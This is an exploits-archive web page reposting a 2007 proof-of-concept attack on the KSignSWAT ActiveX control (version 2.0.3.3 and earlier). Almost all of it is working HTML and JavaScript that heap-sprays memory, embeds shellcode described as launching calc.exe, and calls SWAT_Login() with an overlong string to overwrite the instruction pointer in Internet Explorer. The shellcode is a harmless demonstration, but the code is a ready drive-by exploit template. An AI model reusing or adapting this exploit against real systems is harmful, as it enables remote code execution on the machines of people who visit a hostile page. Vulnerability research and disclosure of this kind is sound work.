首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 KSign KSignSWAT <= 2.0.3.3 ActiveX Control Remote BoF Exploit 来源：l1nefeed@gmail.com 作者：KIM 发布时间：2007-05-23   <!-- /////////////////////////////////////////////////////////////////// // KSignSWAT SWAT_Login() PoC Code.                              // //                                                               // // URL : www.ksign.com                                           // // Author : KIM Kee-hong (l1nefeed@gmail.com)                    // // Date : 2007/05/13                                             // // Notice : Tested on WinXP SP2 KOREAN (all patched) with IE 6   // /////////////////////////////////////////////////////////////////// --> <html> <head> <title> www.ksign.com - KSignSWAT SWAT_Login() PoC code </title> </head> <body> <object ID="vuln" CLASSID="clsid:F326007F-DD23-4724-BAFC-B1C97FC18794"> </object> <script language=javascript> function GetHeapPad(HeapJam, SizeofHeapPad) {     while(HeapJam.length*2 < SizeofHeapPad)     {          HeapJam +=HeapJam;     }     HeapJam = HeapJam.substring(0, SizeofHeapPad/2);     return HeapJam; } // buffer 671 bytes write, then EIP overwrite. var O5pad=unescape(          "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +          "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +          "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +          "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +          "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +          "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +          "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +          "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +          "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +          "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +          "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +          "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +          "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +          "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +          "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +          "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +          "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +          "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +          "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +          "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +          "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +          "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +          "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +          "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +          "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +          "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +          "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +          "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +          "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +          "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +          "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +          "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +          "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +          "%05%05%05%05%05%05%05%05%05%05%05"); var HeapJamAddr = 0x05050505; var SizeofHeap = 0x200000; // calc.exe code. var calcCode = unescape(          "%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" +          "%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F" +          "%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA" +          "%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F" +          "%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78" +          "%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C" +          "%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A%uFF57" +          "%u63E7%u6C61%u0063"); var SizeofCalc = calcCode.length * 2; var SizeofHeapPad = SizeofHeap - (SizeofCalc+0x38); var HeapJam = unescape("%u0505%u0505") HeapJam = GetHeapPad(HeapJam, SizeofHeapPad); HeapBread = (HeapJamAddr - 0x400000)/SizeofHeap; mem = new Array(); for(i = 0; i<HeapBread; i++) {     mem[i] = HeapJam + calcCode; } try {     document.all.vuln.SWAT_Login(O5pad); }catch(e){} </script> </body> </html>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Virtual CD 9.0.0.2 (vc9api.DLL ·LeadTools ISIS Control (ltisi1 ·Pegasus ImagN ActiveX Control ·Dokeos <= 1.8.0 (my_progress.p ·MagicISO <= 5.4 (build239) .cu ·Microsoft IIS 6.0 (/AUX/.aspx) ·Microsoft Visual Basic 6.0 Pro ·LeadTools Raster Variant (LTRV ·Microsoft Visual Basic 6.0 Pro ·Wordpress 2.1.3 admin-ajax.php ·UltraISO <= 8.6.2.2011 (Cue/Bi ·Dokeos <= 1.6.5 (courseLog.php   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved